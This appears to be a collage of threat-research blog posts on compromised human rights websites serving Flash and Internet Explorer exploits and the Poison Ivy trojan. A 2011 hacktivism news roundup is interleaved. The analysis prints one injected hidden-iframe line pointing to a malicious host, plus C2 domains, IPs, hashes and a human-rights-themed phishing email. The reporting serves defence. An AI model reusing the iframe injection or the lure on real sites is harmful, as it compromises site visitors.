Human rights and civil society organizations face a growing spectrum of online threats, including Internet filtering, website defacements, denial of service attacks, and targeted malware (malicious software) attacks. Such organizations can be particularly vulnerable to these threats due to limited resources and lack of computer network security support.

Malware attacks in particular are becoming an increasing problem for human rights and civil society groups. Past Information Warfare Monitor research has documented targeted email-based malware attacks on human rights groups  and the use of compromised organizational websites to deliver malware to site visitors (See Human Rights and Malware Attacks, Targeted Malware Attack on Foreign Correspondent’s based in China, Nobel Peace Prize, Amensty International HK and Malware).  In this blog post we document another instance of a human rights related website being compromised and used to disseminate malware.

While conducting analysis of OpenNet Initiative¹ Internet filtering test results, we found one site² covering Chinese human rights issues that triggered an anti-virus alert. The AV program identified a file from the website as Trojan.Swifi. Looking into this issue, we were able to determine that the site had been compromised and was being used to distribute malware to its visitors.

Tracing our browsing history, we first found that one of the site’s pages had an embedded IFrame that looks out of place:

The frame points to a HTML file on another site, which loaded a Flash file (SWF):

The Flash file uses CVE-2011-2110 (also described in APSB11-18) to download and run another program hosted on the same website, without the knowledge or consent of the user. Trojan.Swifi is the name that Symantec gives to this threat. Shadowserver has a good writeup on the first appearance of these Flash files being used in the wild, and gives some examples of sites they have found hosting this malware.

The URL of the file to download and run is encoded in the parameter passed to the SWF file in the link:

The file itself is compressed using zlib and XOR encrypted with a one byte key. (The key is easy to determine: look for the zlib two byte header.)

The day after we discovered this issue, the link in the IFrame had been changed. The core of the attack, the Flash file, was still the same. However, the Flash file was hosted on a different server and loaded a slightly different executable program: same functionality, different filename and metadata. The first site was one of the examples listed in the Shadowserver report, which may be the reason why the frame was changed to point to a new location with a new payload.

In both cases, the downloaded program installs Poison Ivy, a remote administration tool (RAT).

The Flash file is the same in both cases, as the two payloads have the same encryption and compression format. The URL of the payload is passed as a parameter outside of the Flash program. The MD5 hashes of the two programs and the Flash file are:

b0b33a68bc9b410b8e58979b0409d466   Flash file

First sample:
 c9c58cab8441c07816727a7d9bb77cda  Encrypted + compressed payload
 8ea8b81afa8928da7a12610dfebc57b2  Payload

Second sample:
 c99129da6460dc27b0c92f84c8e0c3ed  Encrypted + compressed payload
 baff5ea74cb2b55ea124a20dc6037f19  Payload

The two downloaded files are slightly different, and have different icons and program information.

Each program contacts a command and control (C2) server using a different dynamic DNS hostname provided by changeip.org (the first using epac.to, the second jetos.com). Both DNS names stopped working within a day, resolving to 0.0.0.0, while the server continues to operate on an ISP in Singapore. The way both were shut down so quickly suggests that this malware has been sent out by more sites than just the Chinese news site on which we discovered it.

Metadata in the first program identifies it as “s1.exe”, while the second is “s3.exe”. Both use “aaaa” as the company name, and “Chinese (PRC)” as the language. The first uses an information bubble as an icon, the second uses a printer icon. s3 also calls itself “flash2” internally, and uses that reference as the dynamic DNS hostname.

It is likely that this C2 server will continue to operate using different dynamic DNS hostnames until it is taken offline by the ISP (assuming the ISP is able and willing to shut it down. So far, the ISP has not responded to the IWM’s abuse reports beyond automated replies from their support ticketing system.) Searching records of previously reported malware activity does not show anything specific to the IP that these programs are connecting to, although it does show many connections to IPs in the same netblock. From our initial examination, the network that is hosting this C2 server seems to be ripe for abuse.

Despite being a legitimate news site, any user who had not made the recent Flash APSB11-18 update would be infected with the Poison Ivy remote administration tool, allowing an attacker full access to the victim’s computer. Due to the location of the hosting provider and dynamic DNS services, it is likely that the command and control server will remain active and this specific threat will persist. Only one line of the legitimate web page needed to be changed in order to compromise every single visitor to the site.

Just as former IWM researcher Nart Villeneuve mentioned last November, we can expect attacks to continue against the visitors of human rights websites via the legitimate but compromised websites themselves. In this case, the attack was patched very quickly and was not a 0day when discovered. However, the time it takes in general for vulnerabilities such as CVE-2011-2110 to be patched versus the rate of these exploits becoming weaponized and actively deployed is troublesome. This threat is especially a problem for smaller organizations that do not have dedicated IT staff with an extensive security budget.

Contestation in and about cyberspace continued this week, with many instances of political events on the ground translating into anonymous actions in cyberspace, as well as an instance of multi-stakeholder disagreement regarding rules of the road for cyberspace.

On June 25, LulzSec announced the end of its operations. Some point out that this announcement coincides with intensified backlash activity around the group: increasing scrutiny from authorities and rival groups alike—such as the active seeking out of LulzSec members. On the same day as the announcement, a Pastebin dump revealed the names and personal information of alleged core LulzSec members. However, although LulzSec has disbanded operations, targeted and politically motived cyber attacks continued.

Breaches continued this week under the banner of AntiSec—the merged LulzSec and Anonymous operation. The group has continued their attack on Arizona’s Department of Public Safety and released personal information about police. Last week, the outfit breached the computers of the DPS and released documents in protest of Arizona’s immigration laws. At the same time, Anonymous released content from servers of other governments were also released—from Anguilla, Brazil and Zimbabwe (in protest of President Mugabe). The group also leaked some US government documents, such as a counter cyber-terrorism training file. Yesterday, the group also attacked an Orlando, Florida tourism Web site, as a part of an Orlando boycott campaign in protest of the city’s treatment of its local Food Not Bombs chapter—a grassroots group which distributes food to the homeless.

Other groups have launched their own politically targeted attacks this week. It was reported that a member of TeaMp0isoN has—in protest of the war in Iraq—leaked personal information about Tony Blair, along with the information of those members of government who supported the war in Iraq and the war on terror. Further, a lone hacker claimed responsibility the DDoS attack against Mastercard, which knocked the site offline in some areas on Tuesday. Gannett Government Media, the publisher of government news sites and print media as well as military-related publications, disclosed the information of an attack on its servers that occurred on June 7. In its statement, Gannett announced that attackers were able to gain unauthorized access to files containing information about some of its users. Web sites that were breached included those belonging to military related publications Defense News, the Armed Forces Journal, the Federal Times, Military Times Edge, Navy times, Air Force Times and the Marine Corps Times, amongst others.

Meanwhile, as new Information Warfare Monitor reports document here and here, the Syrian Electronic Army has intensified its defacements of Western and Israeli Web sites in protest of Western interference of Syria’s internal affairs, and Israel’s position on Syria and Palestine. At the same time, a Facebook group called the “Syrian Hackers School” has been recruiting members and promoting DoS tools and instructions on how to compromise Web site vulnerabilities.

The worries of an increasingly restricted Internet as expressed by civil society groups in the lead up the recent eG8 summit have now become a reality, crystallized in the final OECD communiqué on Internet Policy-Making Principles—a document that evolved out of the OECD’s meeting on the Internet Economy this week in Paris in which governments, businesses, technical experts, and civil society participated. 80 civil society groups, under the Civil Society Information Society Advisory Council (CSISAC) coalition, refused endorsement of the communiqué.

In a statement released this week, the CSISAC expressed its opposition to the document’s emphasis of intellectual property rights protection in guiding Internet policy. It expressed concern that the text may have the effect of elevating cyber security and intellectual property rights to the same level as international human rights (such as freedom of expression) to a point that the former would be disproportionately more protected at the expense of the latter. For instance, CSISAC is concerned that the communique encourages private intermediaries to make decisions regarding the “legality of content passing through their networks and platforms”. CSISAC pointed out that:

This approach could create incentives for Internet intermediaries to delete or block contested content and lead to network filtering, which would harm online expression. In addition Internet intermediaries could voluntarily adopt a “graduated response” (the so-called three strikes rule) under which Internet users’ access could be terminated based solely on repeated allegations of infringement.

For a more detailed summary and analysis of the OECD meeting and civil society objections, see the Internet Governance Project’s latest blogpost. For more on increasing censorship in democracies, see this Washington Post piece which references Google’s recently updated Transparency Report.

China-based hackers have also targeted the State Department, the Naval War College, NASA and the World Bank in recent years. The so-called “Titan Rain” and “Ghostnet” cyber-espionage campaigns starting in 2003 involved hackers systematically infiltrating thousands of computer systems in hundreds of countries. While there’s no smoking gun, the Chinese military has heavily invested in equipping its cyber units, and there is a consensus in the U.S. defense community that the Chinese government at the very least tacitly supports thousands of hackers and cyberspace academics. Tibetan activist groups in particular have gotten used to cyber intrusions, which surged after unrest erupted in western China last March.

The hacking of the human-rights groups’ sites may not seem as threatening as, say, an attack on critical infrastructure. But the intent is just as dangerous: to intimidate and silence those who try to speak up for the Chinese people. Even more reason for the U.S. and other free nations to bolster their defenses.

Civil society organizations face a wide range of online security threats that they are often ill equipped to defend. The lack of both resources and training leaves many organizations vulnerable to even basic Internet-based attacks.

However, civil society organizations are being compromised by attackers using “0day” exploits – vulnerabilities for which there is no patch of “fix” available from the software vendor. Therefore, even if all the software a civil society organization is using is completely up-to-date it is still vulnerable. This results in a situation in which even organizations and individuals with reasonable levels of security are under threat.

It is difficult to determine who is behind the attacks and there may be no intent to target civil society specifically. Perhaps using a human rights themed email in a social engineering attack might just be a convenient way to get peoples’ attention and compromise computer systems. Moreover, it remains unclear if the attackers were able to acquire 0day exploits before they became public, or if they simply quickly leveraged after they became publicly available and before there was a vendor supplied security patch.

Therefore, in this post we explore cases in which there is a some form of relationship between 0day exploits and their use against civil society organizations in an effort to understand the effect of these attacks given the difficult nature of attribution.

In this investigation we discovered that a well known site, 64tianwang.com, had been compromised and was propagating 0day exploits. Moreover, we found similar attacks specifically targeting the Tibetan community.¹ The second case used the high profile case of Tibetan filmmaker Dhondup Wangchen as bait. These attacks were so successful that Reporters Without Borders unknowingly propagated a link to a malicious website posing as a Facebook petition to release Dhondup Wangchen.

Summary

• Civil society organizations are compromised and used as vehicles to deliver 0day exploits
• Attackers have access to multiple 0day exploits and switch their attacks to leverage newer exploits as they become available
• Attackers leverage human rights issues as the context for malware distribution
• The attacks are effective; civil society organizations continue to propagate malicious links within their communities without realizing it.

Background

There is a wealth of information studying 0day malware attacks emanating from locations such as Russia and China. These reports document the ability of the attackers to leverage 0day exploits in their attacks:

One of the most striking features of these attacks is how quickly they adapt new exploits to their
infrastructure. Immediately after the release of a recent IE7 0day exploit, these attackers integrated the new technique into their framework.²

However, these reports do not focus on explicitly political attacks but integrate a variety of threats including fraud, acquiring gaming credentials and in general the theft of information. But the exploration of politically motivated malware attacks using 0day exploits is certainly nothing new.

Maarten Van Horenbeeck has been documenting targeted malware attacks leveled against a variety of targets including civil society organizations.³ Van Horenbeeck documented the use of what he refers to as “custom vulnerability development” as well as known attacks.⁴ These attacks targeted NGO’s, the Tibetan community as well as the Falun Gong movement. Van Horenbeeck’s research showed that some of the same control servers used in these types of attacks were also involved in attacks on a variety of other targets including the United States government, defense contractors and Japanese companies.⁵

Our own previous investigations revealed connections between 0day malware and politically motivated attacks. During the “GhostNet” investigation we found that on September 11, 2008 the Tibetan Government-in-Exile in Dharamsala, India was infected with a malware that connected back to the domain control server on 221.10.254.248 using the host name 927.bigwww.com (221.10.254.248).⁶ On December 10, 2008 this same domain name appeared on a list of domain names serving a 0day exploit for Internet Explorer 7 compiled by the Shadowserver Foundation.⁷

In addition, computers located at the Office of His Holiness the Dalai Lama (OHHDL) as well as a Tibetan NGO called Drewla had bee compromised by a malware network which used www.lookbytheway.net and www.macfeeresponse.org as control servers. This malware network is well known and has been linked to a variety of attacks including the JBIG2 buffer overflow vulnerability.⁸ At Drewla we also found a computer connection to a control server, dns3.westcowboy.com, that was documented by Maarten Van Horenbeeck⁹ as well as connections to religion.xicp.net which was reportedly serving a 0day in February 2009.¹⁰

Investigation

On 2009-07-06 ISC SANS posted a list of domain that were hosting 0day Internet Explorer exploits and 64tianwang.com was on the list.¹¹ 64tianwang.com is a well known organization set up in 1998 to help find missing persons in China, particularly victims of human trafficking. The organization expanded its mission to focus widely on human rights and had to move their website overseas after it was shut down by Chinese authorities.¹² The organization’s founder, Huang Qi, was arrested several times and was imprisoned from June 2000 to June 2005. He is currently in detention awaiting trial.¹³¹⁴ The 64tianwang.com has previously been a target for internet-based attacks.¹⁵

An examination the source of http://www.64tianwang.com/index.htm revealed an iframe. The 64tianwang.com server was likely compromised and the malicious iframe was inserted into the legitimate content on the page. In fact, we have see “iframe attacks” affect a variety of organizations including the Foreign Correspondents’ Club of China (www.fccchina.org).¹⁶ Anyone visiting 64tianwang.com was loading a malicious page from rfsb.xicp.net:

document.write(“<iFraMe width=’0′ height=’0′ src=’hxxp://rfsb.xicp.net/css/a.htm’ frameborder=’0′>“);

The file, a.htm, contains malicious code that attempts to exploit Microsoft DirectShow.¹⁷ Anyone visiting 64tianwang.com using Internet Explorer was likely compromised.

Soon after the discovery of a new 0day exploit, this time in Microsoft Office, the attackers changed the directory used in the initial attack, “css”, to “cssbak” and began serving the Microsoft Office Web Components 0day in the “css” directory instead.¹⁸ Several versions of Microsoft Office were affected and anyone visiting this malicious page could be compromised even of their security updates were current.¹⁹

The details for the malicious website are:

Name: rfsb.xicp.net
Address: 222.223.89.17
netname: CHINANET-HE
descr: CHINANET hebei province network
descr: China Telecom
country: CN

Our investigation discovered that rfsb.xicp.net (222.223.89.17) is also hosting some phishing pages posing at login screen for a variety of Chinese or Chinese language versions of email providers including: 126, 163, 21cn, Eyou, Hanmail, Hinet, Hotmail, QQ, Sina, Sohu, Tom, and Yahoo.

“Phishing” is a terms that refers to the fraudulent use of legitimate looking website to entice a using in revealing sensitive information such as user names and passwords.²⁰ In this case, the attacks appear to be particularly interested in compromising users on Chinese email providers.

If users attempt to login to their email account, the credentials are forwarded to various servers under the attackers’ control:

121.22.23.254
netname: UNICOM-HE
descr: China Unicom Hebei province network
descr: China Unicom
country: CN

124.237.109.234
netname: CHINANET-HE
descr: CHINANET hebei province network
descr: China Telecom
country: CN

121.22.28.29
netname: QHD-YIWANGKEJI
descr: CNC Group CHINA169 Hebei Province Network
country: CN

222.223.89.17 (17.89.223.222.broad.qh.he.dynamic.163data.com.cn)
netname: CHINANET-HE
descr: CHINANET hebei province network
descr: China Telecom
country: CN

my218.3322.org (124.236.29.71, 71.29.236.124.broad.sj.he.dynamic.163data.com.cn)
netname: CHINANET-HE
descr: CHINANET hebei province network
descr: China Telecom
country: CN

The attackers use script that directs the users to a server under the control of the attacker and then redirects the user to the legitimate mail provider.

In the case of QQ the attackers used malicious flash files that connect out to a server under the attackers control.²¹

Interestingly, all the IP’s are in Hebei Province.

The sub-domain rfsb.xicp.net is on a free domain service *.xicp.net run by a Chinese registrar.²²

Shortly thereafter, we were alerted to another malicious domain, dump.vicp.cc, which uses the same free domain service as rfsb.xicp.net. The malicious site, dump.vicp.cc, is also on the ISC SANS list of domains serving the Internet Explorer 0day exploit along with 64tianwang.com and rfsb.xicp.net.

This domain appeared in an email that was sent to the Tibetan community. The email comes from a GMail address with the name “Tseten Samdup.” Tseten Samdup is the name of the head of the Office of Tibet in Geneva, Switzerland.²³

The email forwards an article from Reporters Without Borders (RSF) on the case of Tibetan documentary filmmaker Dhondup Wangchen. In addition to the RSF text, the email contains a link to a “Petition for the Release of Tibetan Filmmaker Dhondup Wangchen” hosted on Facebook which is sponsored by Students for a Free Tibet. However, the email also contains a link to hxxp://dump.vicp.cc/groups/articles.asp?n=3 which loads the real petition along with a malicious frame.

Subject: Re: Petition for Tibetan filmmaker’s
Date: Wed, 29 Jul 2009 22:52:26 +0800
From: Tseten Samdup
To: tsetenfreetibet@gmail.com

Here is the the petition lauched by SFT.

http://apps.facebook.com/causes/petitions/26?m=bcb306a2&recruiter_id=58958974&_fb_noscript=1

They have already collected 27,660 signatures.
Please sign your name if you have not.

Tseden Samdup

> ———- Forwarded message ———-
> From: RSF ASIA
> Date: Wed, Jul 29, 2009 at 8:05 AM
> Subject: Petition for Tibetan filmmaker’s
> To: tsetenfreetibet@gmail.com
>
>
> Reporters Without Borders/Reporters sans frontières
>
> 29 July 2009
>
> CHINA – TIBET
> More than 13,000 signatures on petition for Tibetan filmmaker’s release
> http://www.rsf.org/More-than-13-000-signatures-on.html
>
> Reporters Without Borders has given the Chinese authorities a petition
> calling for the release of Tibetan documentary filmmaker Dhondup Wangchen,
> who has been held since 23 March 2008 and is seriously ill with hepatitis B,
> which is not being properly treated. According to recent reports, he is now
> in a prison in Xining, the capital of Qinghai (a province adjoining Tibet).
>
> At the time of his arrest, Wangchen was completing a documentary about Tibet
> that was shown to foreign journalists in Beijing during the Olympic Games.
> He may be tried on charges of “separatism”.
>
> “There is an urgent need for the competent authorities to heed the appeal
> made by thousands of citizens around the world on behalf of a man whose only
> crime was to have filmed interviews,” Reporters Without Borders said. “The
> government should take account of Dhondup Wangchen’s state of health and
> free him on humanitarian grounds.”
>
> Reporters Without Borders handed in the petition today to the Chinese
> embassy in Paris. It was signed by 13,941 people, who included Tibetans,
> Indians, westerners, and eight Australian parliamentarians. Wangchen’s wife,
> Lhamo Tso, who is a refugee in northern India, collected several thousand
> signatures with the help of the Tibet Post (www.thetibetpost.com).
>
> See Lhamo Tso’s campaign video:
> http://www.dailymotion.com/relevance/search/Dhondup+Wangchen/video/x9zgcf_petition-pour-la-liberation-de-dhon_news
>
> Li Dunyong, a Chinese lawyer hired by the family to defend Wangchen, is
> meanwhile being denied access to him. Li has allowed to see him only once
> since the start of the year in April. Like many human rights lawyers in
> China, he is being harassed by the government, which is threatening to
> rescind his licence if he does not drop the case.
> Vincent Brossel
> Asia-Pacific Desk
> Reporters Without Borders
> 33 1 44 83 84 70
> asia@rsf.org

The second link, hxxp://dump.vicp.cc/groups/articles.asp?n=3, is a malicious link that loads the petition but has another frame (hxxp://dump.vicp.cc/groups/ie.html) that loads a 0day exploit for Adobe Flash.²⁴

This page loads “xp.swf” and drops “zjss.exe” onto the system which attempts to connect to pop.lovenickel.com (66.36.242.59) on port 8080 (there is not currently anything running on 8080). (This same domain was used in a 2006 0day for Japanese word processing software).²⁵

Also hosted in this sites is another page (hxxp://dump.vicp.cc/cach/news.asp?n=1) that uses http://www.leavingfearbehind.com as the bait. This is the website for the film “Leaving Fear Behind.” Dhondup Wangchen is director of the film.

In addition to loading the legitimate website, this link has another frame (hxxp://dump.vicp.cc/cach/error_01.htm) that loads the Microsoft Office Web Components 0day exploit.

The IP address for dump.vicp.cc 210.56.60.132 which is assigned to:

netname: SUN-NETWORK
descr: Sun Network (Hong Kong) Limited
descr: Internet Service Provider in Hong Kong
country: HK

Our investigation found that a malicious link also using www.leavingfearbehind.com as bait was posted in the comment section of BoingBoing on a post about the Uighur crisis.

In addition to an email that was released by Reporters Without Borders (RSF) a web page was also setup on the RSF web site that highlighted the fact that more than 13,000 people signed a petition to release Dhondup Wangchen. However, the page on the RSF web site contained the same link from the malicious email that included both the legitimate Facebook petition by Students for a Free Tibet as well as the malicious link to dump.vicp.cc.²⁶

RSF promptly removed the malicious link after being alerted.

Conclusion

Our findings indicate that civil society organizations are compromised and used as vehicles to deliver 0day exploits to others (e.g. via malicious iframe inserted into a legitimate site). This means that (vulnerable) visitors to the site – many of whom may be staff and supporters of the specific organization – are likely to be compromised.

We have noticed that the attackers have access to multiple 0day exploits and switch their attacks to leverage newer exploits as they become available. While it remains unclear if the attackers were able to acquire these exploits before they became public, the fact that they are able to leverage 0day exploits quickly suggests that the attackers are closely monitoring their operations and have the capacity to adapt when necessary.

The attackers leverage human rights issues as the context for malware distribution in what are commonly called “social engineering” attacks. They will often send malicious emails to members, supporters and affiliates of civil society organizations. These emails are contextually relevant to the target organizations and contain a malicious attachment or link to a malicious site. The computer of the recipient will be compromised if he or she opens the attachment or visits the malicious website.

These attacks are effective. While it is difficult to determine the rate of successful exploitation, we often discover compromised computers at civil society organizations. Moreover, some of these social engineering attacks are so successful that civil society organizations continue to propagate malicious links within their communities without realizing it.

However, the murky questions of intent of the attackers as well responsibility for the attacks remain unclear. One could argue that the attacks are somewhat coincidental. The civil society organizations may just be running vulnerable software that was (automatically) exploited and used just like any other random target as a vehicle to propagate malware through the insertion of a malicious iframe. That is, there is no intent to target civil society specifically. Similarly, using a human rights themed email to in a social engineering attack might just be a convenient way to get peoples’ attention; it is not about targeting civil society per se, just that human rights is an appealing topic and people might more easily enticed to click on such a link.

An alternative explanation is that attackers are intent on targeting civil society and are developing and/or have access to 0day exploits that they actively deploy. There have been consistent reports of attacks against civil society and we are noticing an increasing level of contextual relevance in these attacks. Malicious emails appear to come from email accounts with legitimate names and contact information that are known to the targets. The text of the emails contain less spelling and grammatical errors and exploit legitimate email and petition campaigns. The level of specificity and intentionality exceeds the threshold for a group of attackers that simply wants to infect as many hosts as possible. On the contrary, these attacks actually may limit the total number of hosts but provide the attackers with politically sensitive hosts.

While we have no definitive answers concerning those behind these attacks, the result of using 0day exploits against civil society is that the exploitation rate is high. Moreover, the effect is that the community is being subjected to a form of intimidation and exploitation whether the attacks are intentional or not.

About IWM

The Information Warfare Monitor (www.infowar-monitor.net) is an advanced research activity tracking the emergence of cyberspace as a strategic domain. The IWM is public-private venture between two Canadian institutions: the Citizen Lab at the Munk Centre for International Studies, University of Toronto and The SecDev Group, an operational think tank based in a Ottawa (Canada).

About Malware Lab

The Malware Lab (www.malwarelab.org) is an independent research collective comprised of volunteers that investigates and reports on politically motivated malware attacks, primarily against civil society organizations. The Malware Lab combines technical data with socio-political contextual analysis in order to better understand the capabilities and motivations of the attackers as well as the overall effects and broader implications of targeted attacks.

Notes

1 To be clear, these attacks represent the use of malware by a wide variety of attackers and are not specifically linked to one another. They are included together as part of our analysis of the 0day threat that civil society organizations face.

2 http://www.blackhat.com/presentations/bh-dc-09/ValSmith/BlackHat-DC-09-valsmith-colin-Dissecting-Web-Attacks.pdf

3 http://www.daemon.be/maarten/Crouching_Powerpoint_Hidden_Trojan_24C3.pdf

4 http://isc.sans.org/presentations/SANSFIRE2008-Is_Troy_Burning_Vanhorenbeeck.pdf

5 http://isc.sans.org/presentations/SANSFIRE2008-Is_Troy_Burning_Vanhorenbeeck.pdf

6 http://www.scribd.com/doc/13731776/Tracking-GhostNet-Investigating-a-Cyber-Espionage-Network

7 http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20081210

8 http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20090219

9 http://isc.sans.org/diary.html?storyid=4177

10 http://www.malwaredomainlist.com/forums/index.php?topic=2564.0

11 http://isc.sans.org/diary.html?storyid=6739&rss

12 http://www.nytimes.com/2008/07/11/world/asia/11china.html?th=&emc=th&pagewanted=all

13 http://www.hrichina.org/public/contents/press?revision_id=147917&item_id=56408

14 http://www.amnesty.org/en/library/asset/ASA17/040/2009/en/9ede45c2-3943-4a5b-b75b-7ef68fb6d787/asa170402009en.html

15 http://www.ifex.org/china/2007/07/23/hackers_block_access_to_human_rights/

16 The FCCC’s WordPress installation was compromised and malicious iframes were inserted which loaded hxxp://www.nontopworld.com/homepage.htm and hxxp//http://www.nontopworld.com/mainpage.htm.

17 http://isc.sans.org/diary.html?storyid=6733

18 http://blog.fireeye.com/research/2009/07/who-is-exploiting-office-web-components-0day.html

19 http://blogs.technet.com/srd/archive/2009/07/13/more-information-about-the-office-web-components-activex-vulnerability.aspx

20 http://en.wikipedia.org/wiki/Phishing

21 http://wepawet.iseclab.org/view.php?hash=5f227eaf1e27d92a8c23e2daebbe4b2f&type=swf

22 http://domain.oray.cn/#tab=free

23 http://www.tibetoffice.ch/news/circular_oot_geneva_280308.htm

24 http://blog.fireeye.com/research/2009/07/who-is-exploiting-the-adobe-flash-0day-part-2.html

25 http://www.symantec.com/connect/blogs/justsystems-ichitaro-zero-day-used-propogate-trojan-0

26 The same page in the Google cache from a day earlier did not contain the malicious link.